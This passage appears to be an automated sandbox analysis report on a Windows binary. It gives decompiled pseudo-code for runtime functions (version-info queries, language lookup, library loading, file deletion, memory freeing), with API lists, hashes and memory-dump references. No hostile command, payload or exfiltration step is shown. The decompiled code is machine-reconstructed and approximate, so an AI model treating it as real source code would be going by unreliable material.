                                                                                    0x004af1cf
                                                                                    0x004af1d3
                                                                                    0x004af1d3
                                                                                    0x004af1ed
                                                                                    0x004af1f4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004af1f6
                                                                                    0x004af1fe
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004af200
                                                                                    0x004af208
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004af20a
                                                                                    0x004af20b
                                                                                    0x004af20c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004af20c
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • Sleep.KERNEL32(?,?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1D3
                                                                                    • Sleep.KERNEL32(?,?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1E3
                                                                                    • GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1F6
                                                                                    • GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF200
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: ErrorLastSleep
                                                                                    • String ID:
                                                                                    • API String ID: 1458359878-0
                                                                                    • Opcode ID: 132a67e1d44d9774a6928004e5d8cee8820d44842addde93f31c36794548402b
                                                                                    • Instruction ID: c6a2870ed3ca6a3ef6dac7de38143878fdab2d33d6efdb0808b7300bb595a527
                                                                                    • Opcode Fuzzy Hash: 132a67e1d44d9774a6928004e5d8cee8820d44842addde93f31c36794548402b
                                                                                    • Instruction Fuzzy Hash: 0CF02B37B04224A76724A5EBEC46D6FE298DEB33A8710457BFC04D7302C439CC4542A8
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041FF94, Relevance: 4.6, APIs: 3, Instructions: 93COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 63%
                                                                                    			E0041FF94(void* __eax, void* __ebx, signed int* __ecx, signed int* __edx, void* __edi, void* __esi, signed int* _a4) {
				char _v8;
				char _v9;
				int _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _t33;
				int _t43;
				int _t64;
				intOrPtr _t72;
				intOrPtr _t74;
				signed int* _t77;
				signed int* _t79;
				void* _t81;
				void* _t82;
				intOrPtr _t83;

				_t81 = _t82;
				_t83 = _t82 + 0xffffffe8;
				_v8 = 0;
				_t77 = __ecx;
				_t79 = __edx;
				_push(_t81);
				_push(0x420094);
				_push( *[fs:eax]);
				 *[fs:eax] = _t83;
				_v9 = 0;
				E00407E48( &_v8, __eax);
				E00407FB0( &_v8);
				_t33 = GetFileVersionInfoSizeW(E004084EC(_v8),  &_v16); // executed
				_t64 = _t33;
				if(_t64 == 0) {
					_pop(_t72);
					 *[fs:eax] = _t72;
					_push(0x42009b);
					return E00407A20( &_v8);
				} else {
					_v20 = E004053F0(_t64);
					_push(_t81);
					_push(0x420077);
					_push( *[fs:edx]);
					 *[fs:edx] = _t83;
					_t43 = GetFileVersionInfoW(E004084EC(_v8), _v16, _t64, _v20); // executed
					if(_t43 != 0 && VerQueryValueW(_v20, 0x4200a8,  &_v24,  &_v28) != 0) {
						 *_t79 =  *(_v24 + 0x10) >> 0x00000010 & 0x0000ffff;
						 *_t77 =  *(_v24 + 0x10) & 0x0000ffff;
						 *_a4 =  *(_v24 + 0x14) >> 0x00000010 & 0x0000ffff;
						_v9 = 1;
					}
					_pop(_t74);
					 *[fs:eax] = _t74;
					_push(0x42007e);
					return E0040540C(_v20);
				}
			}



















                                                                                    0x0041ff95
                                                                                    0x0041ff97
                                                                                    0x0041ff9f
                                                                                    0x0041ffa2
                                                                                    0x0041ffa4
                                                                                    0x0041ffaa
                                                                                    0x0041ffab
                                                                                    0x0041ffb0
                                                                                    0x0041ffb3
                                                                                    0x0041ffb6
                                                                                    0x0041ffbf
                                                                                    0x0041ffc7
                                                                                    0x0041ffd9
                                                                                    0x0041ffde
                                                                                    0x0041ffe2
                                                                                    0x00420080
                                                                                    0x00420083
                                                                                    0x00420086
                                                                                    0x00420093
                                                                                    0x0041ffe8
                                                                                    0x0041ffef
                                                                                    0x0041fff4
                                                                                    0x0041fff5
                                                                                    0x0041fffa
                                                                                    0x0041fffd
                                                                                    0x00420012
                                                                                    0x00420019
                                                                                    0x00420041
                                                                                    0x0042004a
                                                                                    0x0042005b
                                                                                    0x0042005d
                                                                                    0x0042005d
                                                                                    0x00420063
                                                                                    0x00420066
                                                                                    0x00420069
                                                                                    0x00420076
                                                                                    0x00420076

                                                                                    APIs
                                                                                    • GetFileVersionInfoSizeW.VERSION(00000000,?,00000000,00420094), ref: 0041FFD9
                                                                                    • GetFileVersionInfoW.VERSION(00000000,?,00000000,?,00000000,00420077,?,00000000,?,00000000,00420094), ref: 00420012
                                                                                    • VerQueryValueW.VERSION(?,004200A8,?,?,00000000,?,00000000,?,00000000,00420077,?,00000000,?,00000000,00420094), ref: 0042002C
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: FileInfoVersion$QuerySizeValue
                                                                                    • String ID:
                                                                                    • API String ID: 2179348866-0
                                                                                    • Opcode ID: db1b7188df03ba7b3b32e0e3197f16d1bbb1710ebdecda22b0e2c2fca2e7d661
                                                                                    • Instruction ID: 087fa93cc02b824bee97242c1a4c1e6fbe52d07f241be95d6751b2a9bfa32856
                                                                                    • Opcode Fuzzy Hash: db1b7188df03ba7b3b32e0e3197f16d1bbb1710ebdecda22b0e2c2fca2e7d661
                                                                                    • Instruction Fuzzy Hash: 19314771A042199FD710DFA9D941DAFB7F8EB48700B91447AF944E3252D778DD00C765
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040B110, Relevance: 3.1, APIs: 2, Instructions: 93COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 72%
                                                                                    			E0040B110(intOrPtr __eax, void* __ebx, signed int __ecx, signed int __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _t41;
				signed short _t43;
				signed short _t46;
				signed int _t60;
				intOrPtr _t68;
				void* _t79;
				signed int* _t81;
				intOrPtr _t84;

				_t79 = __edi;
				_t61 = __ecx;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_t81 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00407B04(_v8);
				E00407B04(_v12);
				_push(_t84);
				_push(0x40b227);
				_push( *[fs:eax]);
				 *[fs:eax] = _t84;
				E00407A20(__ecx);
				if(_v12 == 0) {
					L14:
					_pop(_t68);
					 *[fs:eax] = _t68;
					_push(E0040B22E);
					return E00407A80( &_v28, 6);
				}
				E00407E48( &_v20, _v12);
				_t41 = _v12;
				if(_t41 != 0) {
					_t41 =  *(_t41 - 4);
				}
				_t60 = _t41;
				if(_t60 < 1) {
					L7:
					_t43 = E0040AE34(_v8, _t60, _t61,  &_v16, _t81); // executed
					if(_v16 == 0) {
						L00403730();
						E0040A7E4(_t43, _t60,  &_v24, _t79, _t81);
						_t46 = E0040AF60(_v20, _t60, _t81, _v24, _t79, _t81); // executed
						__eflags =  *_t81;
						if( *_t81 == 0) {
							__eflags =  *0x4bdc0c;
							if( *0x4bdc0c == 0) {
								L00403738();
								E0040A7E4(_t46, _t60,  &_v28, _t79, _t81);
								E0040AF60(_v20, _t60, _t81, _v28, _t79, _t81);
							}
						}
						__eflags =  *_t81;
						if(__eflags == 0) {
							E0040B044(_v20, _t60, _t81, __eflags); // executed
						}
					} else {
						E0040AF60(_v20, _t60, _t81, _v16, _t79, _t81);
					}
					goto L14;
				}
				while( *((short*)(_v12 + _t60 * 2 - 2)) != 0x2e) {
					_t60 = _t60 - 1;
					__eflags = _t60;
					if(_t60 != 0) {
						continue;
					}
					goto L7;
				}
				_t61 = _t60;
				E004088AC(_v12, _t60, 1,  &_v20);
				goto L7;
			}

















                                                                                    0x0040b110
                                                                                    0x0040b110
                                                                                    0x0040b113
                                                                                    0x0040b115
                                                                                    0x0040b117
                                                                                    0x0040b119
                                                                                    0x0040b11b
                                                                                    0x0040b11d
                                                                                    0x0040b11f
                                                                                    0x0040b120
                                                                                    0x0040b121
                                                                                    0x0040b123
                                                                                    0x0040b126
                                                                                    0x0040b12c
                                                                                    0x0040b134
                                                                                    0x0040b13b
                                                                                    0x0040b13c
                                                                                    0x0040b141
                                                                                    0x0040b144
                                                                                    0x0040b149
                                                                                    0x0040b152
                                                                                    0x0040b20c
                                                                                    0x0040b20e
                                                                                    0x0040b211
                                                                                    0x0040b214
                                                                                    0x0040b226
                                                                                    0x0040b226
                                                                                    0x0040b15e
                                                                                    0x0040b163
                                                                                    0x0040b168
                                                                                    0x0040b16d
                                                                                    0x0040b16d
                                                                                    0x0040b16f
                                                                                    0x0040b174
                                                                                    0x0040b19b
                                                                                    0x0040b1a1
                                                                                    0x0040b1aa
                                                                                    0x0040b1bb
                                                                                    0x0040b1c3
                                                                                    0x0040b1d0
                                                                                    0x0040b1d5
                                                                                    0x0040b1d8
                                                                                    0x0040b1da
                                                                                    0x0040b1e1
                                                                                    0x0040b1e3
                                                                                    0x0040b1eb
                                                                                    0x0040b1f8
                                                                                    0x0040b1f8
                                                                                    0x0040b1e1
                                                                                    0x0040b1fd
                                                                                    0x0040b200
                                                                                    0x0040b207
                                                                                    0x0040b207
                                                                                    0x0040b1ac
                                                                                    0x0040b1b4
                                                                                    0x0040b1b4
                                                                                    0x00000000
                                                                                    0x0040b1aa
                                                                                    0x0040b176
                                                                                    0x0040b196
                                                                                    0x0040b197
                                                                                    0x0040b199
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040b199
                                                                                    0x0040b185
                                                                                    0x0040b18f
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • GetUserDefaultUILanguage.KERNEL32(00000000,0040B227,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040B2AE,00000000,?,00000105), ref: 0040B1BB
                                                                                    • GetSystemDefaultUILanguage.KERNEL32(00000000,0040B227,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040B2AE,00000000,?,00000105), ref: 0040B1E3
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: DefaultLanguage$SystemUser
                                                                                    • String ID:
                                                                                    • API String ID: 384301227-0
                                                                                    • Opcode ID: 8091743a5a45bbad2069f173d476493d8776fa257b9783c2651a700d4e0e0a8f
                                                                                    • Instruction ID: e5bcb09f7540d0846d638ab8db7cc306f2a88a3609992180fc1e837192b0f5a6
                                                                                    • Opcode Fuzzy Hash: 8091743a5a45bbad2069f173d476493d8776fa257b9783c2651a700d4e0e0a8f
                                                                                    • Instruction Fuzzy Hash: B0313070A142499BDB10EBA5C891AAEB7B5EF48304F50857BE400B73D1DB7CAD41CB9E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040B234, Relevance: 3.1, APIs: 2, Instructions: 55libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 58%
                                                                                    			E0040B234(void* __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				short _v530;
				char _v536;
				char _v540;
				void* _t44;
				intOrPtr _t45;
				void* _t49;
				void* _t52;

				_v536 = 0;
				_v540 = 0;
				_v8 = 0;
				_t49 = __eax;
				_push(_t52);
				_push(0x40b2ee);
				_push( *[fs:eax]);
				 *[fs:eax] = _t52 + 0xfffffde8;
				GetModuleFileNameW(0,  &_v530, 0x105);
				E00408550( &_v536, _t49);
				_push(_v536);
				E0040858C( &_v540, 0x105,  &_v530);
				_pop(_t44); // executed
				E0040B110(_v540, 0,  &_v8, _t44, __edi, _t49); // executed
				if(_v8 != 0) {
					LoadLibraryExW(E004084EC(_v8), 0, 2);
				}
				_pop(_t45);
				 *[fs:eax] = _t45;
				_push(E0040B2F5);
				E00407A80( &_v540, 2);
				return E00407A20( &_v8);
			}











                                                                                    0x0040b241
                                                                                    0x0040b247
                                                                                    0x0040b24d
                                                                                    0x0040b250
                                                                                    0x0040b254
                                                                                    0x0040b255
                                                                                    0x0040b25a
                                                                                    0x0040b25d
                                                                                    0x0040b270
                                                                                    0x0040b27d
                                                                                    0x0040b288
                                                                                    0x0040b29a
                                                                                    0x0040b2a8
                                                                                    0x0040b2a9
                                                                                    0x0040b2b2
                                                                                    0x0040b2c1
                                                                                    0x0040b2c6
                                                                                    0x0040b2ca
                                                                                    0x0040b2cd
                                                                                    0x0040b2d0
                                                                                    0x0040b2e0
                                                                                    0x0040b2ed

                                                                                    APIs
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B270
                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B2C1
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: FileLibraryLoadModuleName
                                                                                    • String ID:
                                                                                    • API String ID: 1159719554-0
                                                                                    • Opcode ID: c89eb0a175d0b8486c29a163bc28afc1dff8206c8c77fc3926f93841ada109dc
                                                                                    • Instruction ID: c66d7809fa1512833e1e01641763b0ecb7dd00f0751393a0e64d94d028879d96
                                                                                    • Opcode Fuzzy Hash: c89eb0a175d0b8486c29a163bc28afc1dff8206c8c77fc3926f93841ada109dc
                                                                                    • Instruction Fuzzy Hash: 35116070A4421CABDB10EB55CD86BDE77B8DB04304F5144BEE508B32C1DA785F848AA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00427154, Relevance: 3.0, APIs: 2, Instructions: 42fileCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 60%
                                                                                    			E00427154(void* __eax, void* __edx, void* __eflags) {
				int _v8;
				char _v16;
				long _v20;
				int _t13;
				intOrPtr _t27;
				void* _t32;
				void* _t34;
				intOrPtr _t35;

				_t32 = _t34;
				_t35 = _t34 + 0xfffffff0;
				if(E00427108(__eax,  &_v16) != 0) {
					_push(_t32);
					_push(0x4271b1);
					_push( *[fs:eax]);
					 *[fs:eax] = _t35;
					_t13 = DeleteFileW(E004084EC(__edx)); // executed
					_v8 = _t13;
					_v20 = GetLastError();
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(E004271B8);
					return E00427144( &_v16);
				} else {
					_v8 = 0;
					return _v8;
				}
			}











                                                                                    0x00427155
                                                                                    0x00427157
                                                                                    0x0042716c
                                                                                    0x00427177
                                                                                    0x00427178
                                                                                    0x0042717d
                                                                                    0x00427180
                                                                                    0x0042718b
                                                                                    0x00427190
                                                                                    0x00427198
                                                                                    0x0042719d
                                                                                    0x004271a0
                                                                                    0x004271a3
                                                                                    0x004271b0
                                                                                    0x0042716e
                                                                                    0x00427170
                                                                                    0x004271c9
                                                                                    0x004271c9

                                                                                    APIs
                                                                                    • DeleteFileW.KERNEL32(00000000,00000000,004271B1,?,0000000D,00000000), ref: 0042718B
                                                                                    • GetLastError.KERNEL32(00000000,00000000,004271B1,?,0000000D,00000000), ref: 00427193
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: DeleteErrorFileLast
                                                                                    • String ID:
                                                                                    • API String ID: 2018770650-0
                                                                                    • Opcode ID: 6bce5fda464dbdacec63520f594f5bcb5d9fb2b97579abb83185b4526990ec2d
                                                                                    • Instruction ID: b2b9a58b343adce66678156e8009272800f6ed28378062f2bcdc1a6b1bb3db77
                                                                                    • Opcode Fuzzy Hash: 6bce5fda464dbdacec63520f594f5bcb5d9fb2b97579abb83185b4526990ec2d
                                                                                    • Instruction Fuzzy Hash: 7AF0C831B08228ABDB01EFB5AC424AEB7E8DF0971479149BBE804E3341E6395D209698
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00421230, Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 37%
                                                                                    			E00421230(void* __eax, void* __ebx, int __edx) {
				struct HINSTANCE__* _v12;
				int _v16;
				int _t4;
				struct HINSTANCE__* _t9;
				void* _t12;
				intOrPtr _t16;
				void* _t18;
				void* _t19;
				intOrPtr _t20;

				_t18 = _t19;
				_t20 = _t19 + 0xfffffff4;
				_t12 = __eax;
				_t4 = SetErrorMode(__edx); // executed
				_v16 = _t4;
				_push(_t18);
				_push(0x4212a2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				asm("fnstcw word [ebp-0x2]");
				_push(_t18);
				_push(0x421284);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				_t9 = LoadLibraryW(E004084EC(_t12)); // executed
				_v12 = _t9;
				_pop(_t16);
				 *[fs:eax] = _t16;
				_push(0x42128b);
				asm("fclex");
				asm("fldcw word [ebp-0x2]");
				return 0;
			}












                                                                                    0x00421231
                                                                                    0x00421233
                                                                                    0x00421237
                                                                                    0x0042123a
                                                                                    0x0042123f
                                                                                    0x00421244
                                                                                    0x00421245
                                                                                    0x0042124a
                                                                                    0x0042124d
                                                                                    0x00421250
                                                                                    0x00421255
                                                                                    0x00421256
                                                                                    0x0042125b
                                                                                    0x0042125e
                                                                                    0x00421269
                                                                                    0x0042126e
                                                                                    0x00421273
                                                                                    0x00421276
                                                                                    0x00421279
                                                                                    0x0042127e
                                                                                    0x00421280
                                                                                    0x00421283

                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32 ref: 0042123A
                                                                                    • LoadLibraryW.KERNEL32(00000000,00000000,00421284,?,00000000,004212A2), ref: 00421269
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: ErrorLibraryLoadMode
                                                                                    • String ID:
                                                                                    • API String ID: 2987862817-0
                                                                                    • Opcode ID: 5d62b3fe4766baadd73c675683546c7f58e01c4ce11fe1a914dda1a55ed8f36c
                                                                                    • Instruction ID: 4174928c950a8c4d8a753a2a73b5e5f46ee32f9a8ef6f103d2b3a03bcfaff51e
                                                                                    • Opcode Fuzzy Hash: 5d62b3fe4766baadd73c675683546c7f58e01c4ce11fe1a914dda1a55ed8f36c
                                                                                    • Instruction Fuzzy Hash: 15F08270A14744BFDB115F779C5282BBAACE709B047A348BAF800F2691E53C48208574
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004052D4, Relevance: 2.6, APIs: 2, Instructions: 63COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E004052D4() {
				intOrPtr _t13;
				intOrPtr* _t14;
				int _t18;
				intOrPtr* _t23;
				void* _t25;
				void* _t26;
				void* _t28;
				void* _t31;

				_t28 =  *0x004BBADC;
				while(_t28 != 0x4bbad8) {
					_t2 = _t28 + 4; // 0x4bbad8
					VirtualFree(_t28, 0, 0x8000); // executed
					_t28 =  *_t2;
				}
				_t25 = 0x37;
				_t13 = 0x4b7080;
				do {
					 *((intOrPtr*)(_t13 + 0xc)) = _t13;
					 *((intOrPtr*)(_t13 + 8)) = _t13;
					 *((intOrPtr*)(_t13 + 0x10)) = 1;
					 *((intOrPtr*)(_t13 + 0x14)) = 0;
					_t13 = _t13 + 0x20;
					_t25 = _t25 - 1;
				} while (_t25 != 0);
				 *0x4bbad8 = 0x4bbad8;
				 *0x004BBADC = 0x4bbad8;
				_t26 = 0x400;
				_t23 = 0x4bbb78;
				do {
					_t14 = _t23;
					 *_t14 = _t14;
					_t8 = _t14 + 4; // 0x4bbb78
					 *_t8 = _t14;
					_t23 = _t23 + 8;
					_t26 = _t26 - 1;
				} while (_t26 != 0);
				 *0x4bbaf4 = 0;
				E00405884(0x4bbaf8, 0x80);
				_t18 = 0;
				 *0x4bbaf0 = 0;
				_t31 =  *0x004BDB80;
				while(_t31 != 0x4bdb7c) {
					_t10 = _t31 + 4; // 0x4bdb7c
					_t18 = VirtualFree(_t31, 0, 0x8000);
					_t31 =  *_t10;
				}
				 *0x4bdb7c = 0x4bdb7c;
				 *0x004BDB80 = 0x4bdb7c;
				return _t18;
			}











                                                                                    0x004052e2
                                                                                    0x004052f9
                                                                                    0x004052e7
                                                                                    0x004052f2
                                                                                    0x004052f7
                                                                                    0x004052f7
                                                                                    0x004052fd
                                                                                    0x00405302
                                                                                    0x00405307
                                                                                    0x00405309
                                                                                    0x0040530e
                                                                                    0x00405311
                                                                                    0x0040531a
                                                                                    0x0040531d
                                                                                    0x00405320
                                                                                    0x00405320
                                                                                    0x00405323
                                                                                    0x00405325
                                                                                    0x00405328
                                                                                    0x0040532d
                                                                                    0x00405332
                                                                                    0x00405332
                                                                                    0x00405334
                                                                                    0x00405336
                                                                                    0x00405336
                                                                                    0x00405339
                                                                                    0x0040533c
                                                                                    0x0040533c
                                                                                    0x00405341
                                                                                    0x00405352
                                                                                    0x00405357
                                                                                    0x00405359
                                                                                    0x0040535e
                                                                                    0x00405375
                                                                                    0x00405363
                                                                                    0x0040536e
                                                                                    0x00405373
                                                                                    0x00405373
                                                                                    0x00405379
                                                                                    0x0040537b
                                                                                    0x00405382

                                                                                    APIs
                                                                                    • VirtualFree.KERNEL32(004BBAD8,00000000,00008000,?,?,?,?,004053D4,0040CB76,00000000,0040CB94), ref: 004052F2
                                                                                    • VirtualFree.KERNEL32(004BDB7C,00000000,00008000,004BBAD8,00000000,00008000,?,?,?,?,004053D4,0040CB76,00000000,0040CB94), ref: 0040536E
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: FreeVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 1263568516-0
                                                                                    • Opcode ID: 2ac254642d4a9788115c799da738c06d3b344f11962515fad3d8dec7c1c1ac76
                                                                                    • Instruction ID: 8dfda0fc8014d777c4f42bdf36328f4fb77b4e1ecbcf9529c7d2d9386e1eba40
                                                                                    • Opcode Fuzzy Hash: 2ac254642d4a9788115c799da738c06d3b344f11962515fad3d8dec7c1c1ac76
                                                                                    • Instruction Fuzzy Hash: A5116D71A046008FC7689F199840B67BBE4EB88754F15C0BFE549EB791D7B8AC018F9C
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004232EC, Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E004232EC(long __eax, void* __edx) {
				short _v2052;
				signed int _t7;
				void* _t10;
				signed int _t16;
				void* _t17;

				_t10 = __edx;
				_t7 = FormatMessageW(0x3200, 0, __eax, 0,  &_v2052, 0x400, 0); // executed
				while(_t7 > 0) {
					_t16 =  *(_t17 + _t7 * 2 - 2) & 0x0000ffff;
					if(_t16 <= 0x20) {
						L1:
						_t7 = _t7 - 1;
						__eflags = _t7;
						continue;
					} else {
						_t20 = _t16 - 0x2e;
						if(_t16 == 0x2e) {
							goto L1;
						}
					}
					break;
				}
				return E00407BA8(_t10, _t7, _t17, _t20);
			}








                                                                                    0x004232f3
                                                                                    0x0042330b
                                                                                    0x00423313
                                                                                    0x00423317
                                                                                    0x00423320
                                                                                    0x00423312
                                                                                    0x00423312
                                                                                    0x00423312
                                                                                    0x00000000
                                                                                    0x00423322
                                                                                    0x00423322
                                                                                    0x00423326
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00423326
                                                                                    0x00000000
                                                                                    0x00423320
                                                                                    0x00423339

                                                                                    APIs
                                                                                    • FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,00423C1E,00000000,00423C6F,?,00423E28), ref: 0042330B
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: FormatMessage
                                                                                    • String ID:
                                                                                    • API String ID: 1306739567-0
                                                                                    • Opcode ID: 8c28d4cd2feba8420b72e2c8323dac74420019247290cbce7f55a68a80108edc
                                                                                    • Instruction ID: 75fedbff241bec6efc8727d26b236f8c34027f11b3bdd8370f626a5f6d270aaf
                                                                                    • Opcode Fuzzy Hash: 8c28d4cd2feba8420b72e2c8323dac74420019247290cbce7f55a68a80108edc
                                                                                    • Instruction Fuzzy Hash: 89E0D86075432121F624A9052C03B7B2129A7C0B12FE084367A80DE3D5DEADAF55525E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00422A18, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 31%
                                                                                    			E00422A18(void* __eax, void* __ebx, void* __ecx, void* __eflags) {
				char _v8;
				intOrPtr _t21;
				intOrPtr _t24;

				_push(0);
				_push(_t24);
				_push(0x422a5e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t24;
				E004229AC(__eax, __ecx,  &_v8, __eflags);
				GetFileAttributesW(E004084EC(_v8)); // executed
				_pop(_t21);
